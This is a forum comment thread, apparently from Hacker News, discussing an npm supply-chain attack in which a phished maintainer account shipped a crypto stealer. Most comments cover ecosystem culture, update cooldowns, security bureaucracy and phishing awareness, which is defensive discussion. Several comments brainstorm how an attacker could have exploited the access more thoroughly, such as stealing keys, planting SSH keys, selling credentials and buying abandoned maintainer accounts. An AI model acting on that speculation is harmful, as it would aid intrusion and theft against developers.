Posted by WhyNotHugo 3 days ago
This happened even if you had pinned dependencies and were on top of security updates.
We need some deeper changes in the ecosystem.
https://github.com/nrwl/nx/security/advisories/GHSA-cxm3-wv7...
I avoid anything to do with NPM, except for the typescript compiler, and I'm looking forward to the rewrite in Go where I can remove even that. For this reason.
As a comparison, in Go, you have minimum version spec, and it takes great pains to never execute anything you download, even during compilation stage.
NPM will often have different source then the github repo source. How does anyone even trust the system?
The obscurity of languages other than JavaScript will only work as a security measure for so long.
None of it will help you when you're executing the binaries you built, regardless of which language they were written in.
Lavamoat would, if you get to the point of running your program with lavamoat-node or built with the lavamoat webpack plugin: https://lavamoat.github.io/guides/getting-started/
Sure it would... isn't that the whole point of Deno? The binary can't exfiltrate anything if you don't let it connect to the net.
Whenever you download an open-source program and you don't have to compile it first, you're at risk of running code that is not necessarily what's in the publicly-available source code.
This can even apply to source code itself when distributed through two different channels, as we saw in the xz backdoor attempt. (The release tarball contained different code to the repository.)
I have seen so many takes lamenting how this kind of supply chain attack is such a difficult problem to fix.
No it really isn't. It's an ecosystem and cultural problem that npm encourages huge dependency trees that make it impractical to review dependency updates so developers just don't.
The alternative is C++, where every project essentially starts by reinventing the wheel, which comes with its own set of vulnerabilities.
I'm saying this without a clear idea of how to fix this very real problem.
Sure, in 1995.
Most C++ projects nowadays belong to some fairly well understood domain and for every broad domain there is usually one or two large 'ecosystem' libraries that come batteries included. Huge monolithic dependency with well stablished governance instead of 1000 small ones.
Examples of such ecosystems are Qt, LLVM, ROOT, tensorflow, etc. For smaller projects that want something slightly more than a standard library but not belonging to a clear ecosystem like the above you have boost, folly, abseil, etc.
Most of these started by someone deciding to reinvent the wheel decades ago, but there's no real reason to do that in 2025.
The difficulty comes in trying to change the entire culture.
“Stop doing that!”
“But I wanna!”
Other languages has similar package managers as npm, but with much less issues, so it can be fixed without changing the package manager completely.
And before you know it, you have a multitude of distributions to choose from, each with their own issues...
Source available beats open source from a security perspective.
It is an ecosystem and culture that learned nothing from the debacle of left pad. And it is an affliction that many organizations face and it is only going to get worse with the advent of AI assisted coding (and it does not have to be).
There simply arent enough adults in the room with the ability to tell the children (or VC's and business people) NO. And getting an "AI" to say no is next to impossible unless you're probing it on a "social issue".
I don't know anything about the npm ecosystem, what's the benefit of importing these libraries compared to including these code in the project?
I am a consumer of apps using npm, not a developer, and I simply don’t like the auto updates and seeing a zillion things updated. I use uv and Python a lot, and I get a similar uneasy feeling there also, but (perhaps incorrectly) I feel more in control.
Seriously, this is one of my key survival mechanisms. By the time I became system administrator for a small services company, I had learned to let other people beta test things. We ran Microsoft Office 2000 for 12 years, and saved soooo many upgrade headaches. We had a decade without the need to retrain.
That, and like other have said... never clicking links in emails.
Such a feature can be added.
At $PAST_DAYJOB we've adopted Docker "only" around 2016, and importantly, we've used it almost identically to how we used to deploy "plain" uWSGI or Apache apps: a bunch of VMs, run some Ansible roles, pull the code (now image), restart, done.
The time to move to k8s is when you have a k8s-sized problem. [Looks at Github: 760 releases, 3866 contributors.] Yeah, not now.
> A zero-day exploit is a cyberattack vector that takes advantage of an unknown or unaddressed security flaw in computer software, hardware or firmware. "Zero day" refers to the fact that the software or device vendor has zero days to fix the flaw because malicious actors can already use it to access vulnerable systems.
If I never install the infected software, I'm not vulnerable, even if no one knows of its existence.
That said, you could argue that because it's a zero day and no one caught it, it can lie dormant for >2 weeks so your "just wait awhile" strategy might not work if no one catches it in that period.
But if you're a hacker, sitting on a goldmine of infected computers... do you really want to wait it out to scoop up more victims before activating it? It might be caught.
No one bothers finding 0-days in software which no one has installed.
Better defense would be to delete or quarantine the compromised versions, fail to build and escalate to a human for zero-day defense.
Reading the code content of emergency patches should be part of the job. Of course, with better code trust tools (there seem to have been some attempts at that lately, not sure where they’re at), we can delegate that and still do much better than the current state of things.
They stop working before can use them.
https://docs.renovatebot.com/configuration-options/#minimumr...
Dependabot has recently added this functionality too - it's called `cooldown`
https://docs.github.com/en/code-security/dependabot/working-...
(I'm soon to be working at Mend on Renovate full time, but have been a big fan of Renovate over other tools for years)
Renovate uses signals like your CI to work out whether things break before an automerge occurs - does that mean your CI didn't catch the breakage? Or something I've missed?
(there's also the "merge confidence" that can help here)
(I'm soon to be working at Mend on Renovate full time)
"Hey, is it still broken? No? Great!"
If I compare a typical Rust project, with a same JavaScript one, JavaScript project itself often has magnitudes more direct dependencies (wide supply chain?). The rust tool will have three or four, the JavaScript over ten, sometimes ten alone to help with just building the typescript in dev. Worsened by the JavaScript dependencies own deps (and theirs, and theirs, all the way down to is_array or left_pad). Easily getting in the hundreds. In rust, that graph will list maybe ten more. Or, with some complex libraries, a total of several tens.
This attitude difference is also clear in Python community. Where the knee-jerk reaction is to add an import, rather than think it through, maybe copy paste a file, and in any case, being very conservative. Do we really need colors in the terminal output? We do? Can we not just create a file with some constants that hold the four ANSI escape codes instead?
I'm trying to argue that there's also an important cultural problem with supply chain attacks to be considered.
I object. You can get a full-blown web app rolling with Django alone. Here's it's list of external dependencies, including transitive: asgiref, sqlparse, tzdata. (I guess you can also count jQuery, if you're using the _builtin_ admin interface.)
The standard library is slowly swallowing the most important libraries & tools in the ecosystem, such as json or venv. What was once a giant yield-hack to get green threads / async, is now a part of the language. The language itself is conservative in what new features it accepts, 20yro Python code still reads like Python.
Sure, I've worked on a Django codebase with 130 transitive dependencies. But it's 7yro and powers an entire business. A "hello world" app in Express has 150, for Vue it's 550.
This has more to do with the popularity of a language than anything else, I think. Though the fact that Python and JS are used as "entry level" languages probably encourages some of these "lazy" libraries cough cough left-pad cough cough.
But in the end, we should all rely on fewer dependencies. It's certainly the philosophy I'm trying to follow with https://mastrojs.github.io – see e.g. https://jsr.io/@mastrojs/mastro/dependencies
I find it insane that someone would get access to a package like this, then just push a shitty crypto stealer.
You're a criminal with a one-in-a-million opportunity. Wouldn't you invest an extra week pushing a more fledged out exploit?
You can exfiltrate API keys, add your SSH public key to the server then exfiltrate the server's IP address so you can snoop in there manually, if you're on a dev's machine maybe the browser's profiles, the session tokens common sales websites? My personal desktop has all my cards saved on Amazon. My work laptop, depending on the period of my life, you could have had access to stuff you wouldn't believe either.
You don't even need to do anything with those, there's forums to sell that stuff.
Surely there's an explanation, or is it that all the good cybercriminals have stable high paying jobs in tech, and this is what's left for us?
Because the way this was pulled off, it was going to be found out right away. It wasn't a subtle insertion, it was a complete account take over. The attacker had only hours before discovery - so the logical thing to do is a hit and run. They asked what is the most money that can be extracted in just a few hours in an automated fashion (no time to investigate targets manually one at a time) and crypto is the obvious answer.
Unless the back doors were so good they weren't going to be discovered even though half the world would be dissecting the attack code, there was no point in even trying.
It might get missed, but I sure notice any time account emails come through even if it's not saying "your password was reset."
And very, very happy that we're proxying all access to npm through Artifactory, which allowed us to block the affected versions and verify that they were in fact never pulled by any of our builds.
That could have netted the attacker something much more valuable, but it is pure hit or miss and it requires more skill and patience for a payoff.
VS blast out some crypto stealing code and grab as many funds as possible before being found out.
> Lots of people/organisations are going to be complacent and leave you with valid credentials
You'd get non-root credentials on lots of dev machines, and likely some non-root credentials on prod machines, and possibly root access to some poorly configured machines.
Two factor is still in place, you only have whatever creds that NPM install was ran with. Plenty of the really high value prod targets may very well be on machines that don't even have publicly routable IPs.
With a large enough blast radius, this may have worked, but it wouldn't be guaranteed.
is that so? from the email it looks like they MITM'd the 2FA setup process, so they will have qix's 2FA secret. they don't have to immediately start taking over qix's account and lock him out. they should have had all the time they need to come up with a more sophisticated payload.
A decade ago my root/123456 ssh password got pwned in 3-4 days. (I was gonna change to certificate!)
Hetzner alerted me saying that I filled my entire 1TB/mo download quota.
Apparently, the attacker (automation?) took over and used it to scrape alibaba, or did something with their cloud on port 443. It took a few hours to eat up every last byte. It felt like this was part of a huge operation. They also left a non-functional crypto miner in there that I simply couldn't remove.
So while they could cryptolock, they just used it for something insidious and left it alone.
Putting it another way: if I'm a random small-time burglar who happens to find himself in Walter White's vault, I'm stuffing as much cash as I can fit into my bag and ignoring the barrel of methylamine.
The damage from this hack could have been far worse if it was stealing real money people rely on to feed their kids.
Sure, if someone takes my grocery money, that’s a real loss, and that’s why I don’t carry large sums of cash. But that isn’t what happened here.
Can you explain what you meant so I can understand? I think you had a point, I just don’t think that the risk of the kind of attack in TFA is comparable to someone getting their grocery money stolen, because the financial situation for that individual in-person theft can’t really occur on the same scale as the attack in TFA, and even if it could, that’s kind of on the end user for carrying more cash than they can defend.
Not always. Many banks will claim e.g. they don't have to cover losses from someone who opened a phishing email, never mind that the bank themselves sends out equally suspicious "real" emails on the regular.
Also even if it's covered that money comes from somewhere - ultimately out of the pockets of regular folks who were just using their bank accounts, even if the insurance mechasims mean it's spread out more widely.
Even if you steal other stuff, you're going to need to turn it all into cryptocurrency anyway, and how much is an AWS key really going to bring in.
There are criminals that focus on extracting passwords and password manager databases as well, though they often also end up going after cryptocurrency websites.
There are probably criminals out there biding their time, waiting for the perfect moment to strike, silently infiltrating companies through carefully picked dependencies, but those don't get caught as easily as the ones draining cryptocurrency wallets.
A couple hundred grand is not what these attackers are after.
step 1: live in a place where the cops do not police this type of activity
step 2: $$$$
> one-in-a-million opportunity
OTOH, this modus operandi is completely inconsistent with the way they published the injected code: by taking over a developer's account. This was going to be noticed quickly.
If the payload had been injected in a more subtle way, it might have taken a long time to figure out. Especially with all the levenshtein logic that might convince a victim they'd somehow screwed up.
In the case of North Korea, it's really crazy because hackers over there can do this legally in their own country, with the support of their government!
And most popular npm developers are broke.
You wouldn't get targeted not because they cant but its not worth it
many state sponsored attack is well documented in a lot of book that people can read they don't want to add much record because its create buzz
But (1) how do you do that with hundreds or thousands of SSH/API keys and (2) how do you actually make money from it?
So you get a list of SSH or specific API keys and then write a crawler that can hopefully gather more secrets from them, like credit card details (how would that work btw?) and then what, you google "how to sell credentials" and register on some forum to broker a deal like they do in movies?
Sure sounds a hell of a lot more complicated and precarious than swapping out crypto addresses in flight.
The plot of Office Space might offer clues.
Also isn't it crime 101 that greedy criminals are the ones who are more likely to get caught?
What gets me is everyone acknowledges this, yet HN is full of comments ripping on IT teams for the restrictions & EDR put in place on dev laptops.
We on the ops side have known these risks for years and that knowledge of those risks are what drives organizational security policies and endpoint configuration.
Security is hard, and it is very inconvenient, but it's increasingly necessary.
To wit: I have an open ticket right now from an automated code review tool that flagged a potential vulnerability. I and two other seniors have confirmed that it is a false alarm so I asked for permission to ignore it by clicking the ignore button in a separate security ticket. They asked for more details to be added to the ticket, except I don’t have permissions to view the ticket. I need to submit another ticket to get permission to view the original ticket to confirm that no less than three senior developers have validated this as a false alarm, which is information that is already on another ticket. This non-issue has been going on for months at this point. The ops person who has asked me to provide more info won’t accept a written explanation via Teams, it has to be added to the ticket.
Stakeholders will quickly treat your entire security system like a waste of time and resources when they can plainly see that many parts of it are a waste of time and resources.
The objection isn’t against security. It is against security theater.
It might not be sensible for the organization as a whole, but there’s no way to determine that conclusively, without going over thousands of different possibilities, edge cases, etc.
I have already documented, in writing, in multiple places, that the automated software has raised a false alarm, as well as providing a piece of code demonstrating that the alert was wrong. They are asking me to document it in an additional place that I don't have access to, presumably for perceived security reasons? We already accept that my reasoning around the false alarm is valid, they just have buried a simple resolution beneath completely stupid process. You are going to get false alarms, if it takes months to deal with a single one, the alarm system is going to get ignored, or bypassed. I have a variety of conflicting demands on my attention.
At the same time, when we came under a coordinated DDOS attack from what was likely a political actor, security didn't notice the millions of requests coming from a country that we have never had a single customer in. Our dev team brought it to their attention where they, again, slowed everything down by insisting on taking part in the mitigation, even though they couldn't figure out how to give themselves permission to access basic things like our logging system. We had to devote one of our on calls to walking them through submitting access tickets, a process presumably put in place by a security team.
I know what good security looks like, and I respect it. Many people have to deal with bad security on a regular basis, and they should not be shamed for correctly pointing out that it is terrible.
The ops person obviously can’t do that on your behalf, at least not in any kind of organizational setup I’ve heard of.
So the solution to an illogical, kafkaesque security process is to bypass the process entirely via authority?
You are making my argument for me.
This is exactly why people don’t take security processes seriously, and fight efforts to add more security processes.
Edit: I didn’t comment on all those other points, so it seems irrelevant to the one question I asked.
Ops are the ones who imposed those constraints. You can't impose absurd constraints and then say you are acting reasonable by abiding by your own absurd constraints.
I'm not dumping on the ops person, but the ops and security team's processes. If you as a developer showed up to a new workplace and the process was that for every code change you had to print out a diff and mail a hard copy to the committee for code reviews, you would be totally justified in calling out the process as needlessly elaborate. Anyone could rightly say that your processes are increasing friction while not actually serving the purpose of having code reviewed by peers. You as a developer have a responsibility to point out that the current process serves no one and should be changed. That's what good security and ops people do too.
In the real world case I am talking about, we can easily foresee that the end result is that the exemption will be allowed, and there will be no security impact. In no way does the process at all contribute to that, and every person involved knows it.
My original post was about how people dislike security when it is actually security theater. That is what is going on here. We already know how this issue ends and how that can be accomplished (document the false alarm, and click the ignore button), and have already done the important part of documenting the issue for posterity.
The process could be: you are a highly paid developer who takes security training and has access to highly sensitive systems so we trust your judgment, when you and your peers agree that this isn't an issue, write that down in the correct place, click the ignore button and move on with your work.
All of the faff of contacting different fiefdoms and submitting tickets does nothing to contribute to the core issue or resolution, and certainly doesn't enhance security. If anything, security theater like this leads to worse security since people will try to find shortcuts or ways of just not handling issues.
All their EDR crud runs on Windows, but as a dev I'm allowed to run WSL but the tools do not reach inside WSL so if that gets compromised they would be none the wiser.
There is some instrumentation for linux servers and cloud machines, but that too is full of blind spots.
And as a sibling comment says, a lot of the policies are executed without anyone being able to explain their purpose, being able to grant "functionally equivalent security" exceptions or them even making sense in certain contexts. It feels like dealing with mindless automatons, even though humans are involved. For example a thing that happened a while ago: We were using scrypt as KDF, but their scanning flagged it as unknown password encryption and insisted that we should use SHA2 as a modern, secure hashing function. Weeks of long email threads, escalation and several managers suggesting "just change it to satisfy them" followed. That's a clear example of mindless rule-following making a system less secure.
Blocking remote desktop forwarding of security keys also is a fun one.
For anything else you need a fiat market, which is hard to deal with remotely.
The attacker had access to the user's npm repository only.
Your ideas are potentially lubricative over time, but first it creates more work and risk for the attacker.
Also, you underestimate how trivial this 'one-in-a-million opportunity' is; it's definitely not a one-in-a-million! Almost anybody with basic coding ability and a few thousand dollars could pull off this hack. There are thousands of libraries which are essentially worthless with millions of downloads and the author who maintains is basically broke and barely uses their npm account anymore. Anybody could just buy those npm accounts under false pretenses for a couple of thousands and then do whatever they want with tens of thousands (or even hundreds of thousands) of compromised servers. The library author is legally within their rights to sell their digital assets and it's not their business what the acquirer does with them.
Consumer financial fraud is quite big and relatively harmless. Industrial espionage, otoh, can potentially put you in the cross hairs of powerful and/or rouge elements, and so, only the big actors get involved, but in a targeted way, preferring to not leave much if any trace of compromise.
nobody cares about your trade secrets, or some nation's nuclear program, just take the crypto
That looks like a phishing attempt from someone using a random EC2 instance or something, but apparently it's legit. I think. Even the "heads-up" email they sent beforehand looked like phishing, so I was waiting for the actual invoice to see if they really started using that address, but even now I'm not opening these attached PDFs.
These companies tell customers to be suspicious of phishing attempts, and then they pull these stunts.
Edit: nvm it seems it's not the case
Yep. At every BigCo I've worked at, nearly all of the emails from Corporate have been indistinguishable from phishing. Sometimes, they're actual spam!
Do the executives and directors responsible for sending these messages care? No. They never do, and get super defensive and self-righteous when you show them exactly how their precious emails tick every "This message is phishing!" box in the mandatory annual phishing-detection-and-resistance training.
A week later some executive pushing the training emailed the entire company saying that it was unacceptable that nobody from engineering had logged into the training site and spun some story about regulatory requirements. After lots of back and forth they still wouldn't accept that it obviously looked like a phishing email.
Eventually when we actually did the training, it literally told us to check the From address of emails. I sometimes wonder if it was some weird kind of performance art.
“We got pwned but the entire company went through a certified phishing awareness program and we have a DPI firewall. Nothing more we could have done, we’re not liable.”
[0] ...so the payments serve the social function of enriching your buddy and improving your status in the whole favor economy thing...
Our infra guy then had to argue with them for quite a while to just email from their own domain, and that no, we're weren't going to add their cert to our DNS, and let a third party spoof us (or however that works, idk). Absolutely shocking lack of self awareness.
Title: "Expense report overdue - Please fill now"
Subject:
<empty body>
<Link to document trying it's best to look like google's attachment icon but was actually a hyperlink to a site that asked me to log in with my corporate credentials>
---
So like, obviously this is a stupid phishing email, right? Especially as at this time, I had not used my corporate card.
A few weeks later I got the finance team reaching out threatening to cancel my corporate card because I had charges on it with no corresponding expense report filed.
So on checking the charge history for the corporate card, it was the annual tax payment that all cards are charged in my country every year, and finance should have been well aware of. Of course, then the expense system initially rejected my report because I couldn't provide a receipt, as the card provider automatically deducts this charge with no manual action on the card owner's side...
Cool, get big enough, become friends with the right people and you can squat an entire name on the internet. What, you're the Nepalese Party for Marxists, you've existed for 70 years and you want to buy npm.np ? Nope, tough luck, some random dude pushes shitty javascript packages over there. Sorry for the existing npm.org address too, we're going to expropriate the National Association of Pastoral Musicians. Dare I remind you that the whole left-pad situation was because Kik, the company, stole (with NPM's assistance because they were big enough and friends with the right people) the kik package ?
At least they're paying dozens of millions to buy a shitty ass .google that noone cares about because more and more browsers are hiding the URL bar. I'm glad ICANN can use it to buy drinks, hookers instead of being useful.
And then never even did anything with it.
I think you and I have drastically different ideas about how dramatic a response is warranted by the scenario of needing to buy a domain with a different three letters or maybe even four or more letters before the TLD.
> Dare I remind you that the whole left-pad situation was because Kik, the company, stole (with NPM's assistance because they were big enough and friends with the right people) the kik package ?
...and then the package was entirely removed, which would have been preventable by sane policies around making removal just not allow new dependencies to use it. You're also conflating a resource that's ostensibly free and perpetual for people to claim with one that's only rented for fixed periods of time for money.
I agree that especially larger players should be proactive and register all similar-sounding TLDs to mitigate such phishing attacks, but they can't be outright prevented this way.
You can't protect against people clicking links in emails in this way. You might say `npmjs-help.ph` is a phishy domain, but npmjs.help is a phishy domain and people clicked it anyway.
Domain: NPMJS.HELP (85 similar domains)
Registrar: Porkbun, LLC (4.84 million domains)
Query Time: 8 Sep 2025 - 4:14 PM UTC [1 DAY BACK] [REFRESH]
Registered: 5th September 2025 [4 days back]
Expiry: 5th September 2026 [11 months, 25 days left]
I'd be suspicious of anything registered with Porkbun discount registrar. 4 days ago, means it's fake.> It sets a deadline a few days in the future. This creates a sense of urgency, and when you combine urgency with being rushed by life, you are much more likely to fall for the phishing link.
Any time I feel like I'm being rushed, I check deeper. It would help if everyone's official communications only came from the most well known domain (or subdomain).
Heuristics like this one should be performed automatically by the email client.
Added: story dedicated to this topic more or less https://news.ycombinator.com/item?id=45179889
I would be very worried about my 2FA provider if they asked me to do this.
And so I would not rate this phishing email a 10/10 at all.
To this day, I don't follow links in other kinds of emails. I mouse over the link to view the domain as a first step in determining how seriously to take the email. If the domain appears to match the known-good one, I copy the link and examine the characters to see if any Unicode lookalikes have been employed.
If the domain seems legitimate, or if I don't recognize it but the email is so convincing that I suspect the company truly is using a different domain (my bank has done this, frustratingly), I still don't click the link. I log in to my account on the known-good domain -- by typing it by hand into the browser's address bar -- and look for notifications.
If there are no notifications, then I might contact the company about the email to verify its authenticity.
If anyone reading thinks that seems like a lot of work, I agree with you! It stinks. But I humbly submit that it's necessary on today's Internet. And it's especially necessary if you're in charge of globally used software libraries.
To adopt the tone of the article's author, if they aren't willing to do that, they're wrong, and they're going to keep getting phished.
I think the vast vast majority of people would have fallen for it, it's a decent looking message, it has a sense of urgency and the domain doesn't look wildly wrong. Devs in theory might be more security aware, but also we work with a lot of different apps, systems and sites - mixed domains, weird deep-links, redirects we've all used (and possibly even deployed) such setups.
Add in most of my email is now through a corporate outlook, so domains aren't very visible it's all nestled behind "safelinks", and personal email is often on a phone so mousing over a link just isn't muscle memory anymore.
I think I'd be suspicious at the request, but possibly have clicked to see more, especially with the threat things might stop working soon. Maybe NPM/package platforms should be pushing security training to their biggest maintainers like your old corporation did, but for now they don't and the idea that people should be more aware of the risk is sort of the point.
Almost anyone would have fallen for that, thats why almost all of us need to be reminded to think of this stuff more.
When a lone developer is untrained and doesn't follow best practices, as happened here, the community rushes to their defense on the grounds of empathy: "We would ALL make this mistake." But what if we wouldn't? What if we're trained and have certain safety protocols and procedures that we hold ourselves to?
This is why, at the end of the day, I run my company on a more centralized ecosystem, for all its warts. At least there's the promise of standard practices and procedures and training, whether it's always perfectly fulfilled or not. With a community-driven ecosystem, you don't have that: You're relying on the standards of the community, a vague and nebulous group that doesn't necessarily have any security sense, as you rightly pointed out. I realize not everyone has the luxury of making that choice due to career/financial constraints.
I think that's overstated. This phishing attempt had some obvious red flags that many people here would have noticed, sure. So not everyone is going to fall for this phish.
But the principle is better expressed as "Everyone will fall for a phish", somewhere. Even you. Human engineering is human engineering and we're all fallible. All that's required is that someone figure out which mistakes you're likely to make.
I like to think I wouldn't. I don't put credentials into links from emails that I didn't trigger right then (e.g. password reset emails). That's a security skill everyone should be practicing in 2025.
1. Like you, I never put credentials into links from emails that I didn’t trigger/wasn’t expecting. This is a generally-sensible practise.
2. Updating 2FA credentials is nonsense. I don’t expect everyone to know this, this is the weakest of the three.
3. If my credentials don’t autofill due to origin mismatch, I am not filling it manually. Ever. I would instead, if I thought it genuine, go to their actual site and log in there, and then see nothing about what the phish claimed. I’ve heard people talking about companies using multiple origins for their login forms and how having to deal with that undermines this aspect, but for myself I don’t believe I’ve ever seen that, not even once. It’s definitely not common, and origin-locked second factors should make that practice disappear altogether.
Now these three are not of equal strength. The second requires specific knowledge, and a phish could conceivably use something similar that isn’t such nonsense anyway. The first is a best practice that seems to require some discipline, so although everyone should do it, it is unfortunately not the strongest. But the third? When you’re using a password manager with autofill, that one should be absolutely robust. It protects you! You have to go out of your way to get phished!
The problem with this is that companies often send out legit emails saying things like "update your 2FA recovery methods". Most people don't know well enough how 2FA works to spot the difference.
It would be just as easy to argue that anyone who uses software and hasn't confirmed their security certifications include whatever processes you imagine avoids 'human makes 1 mistake and continues with normal workflow' error or holds updates until evaluated is negligent.
The point of not assigning blame isn't to absolve people of the need to have their guard up but to recognise that everyone is capable of mistakes.
I've had emails like that from various places, probably legitimate, but I absolutely never click the bloody link from an email and enter my credentials into it! That's internet safety 101.
Same issue with python, rust etc. It’s all very trust driven
In the Java world, I know there’s been griping from mostly juniors re “why isn’t Maven easy like npm?” (I work with some of these people). I point them to this article: https://www.sonatype.com/blog/why-namespacing-matters-in-pub...
Maven got a lot of things right back in the day. Yes POM files are in xml and we all know xml sucks etc, but aside from that the stodgy focus on robustness and carefully considered change gets more impressive all the time.
The only solution would be to prevent all releases from being applied immediately.
No hardware keys, no new releases.
They have it implemented.
I created NPM account today and added passkey from my laptop and hardware key as secondary. As I have it configured it asked my for it while publishing my test package.
So the guy either had TOTP or just the pw.
Seems like should be easy to implement enforcement.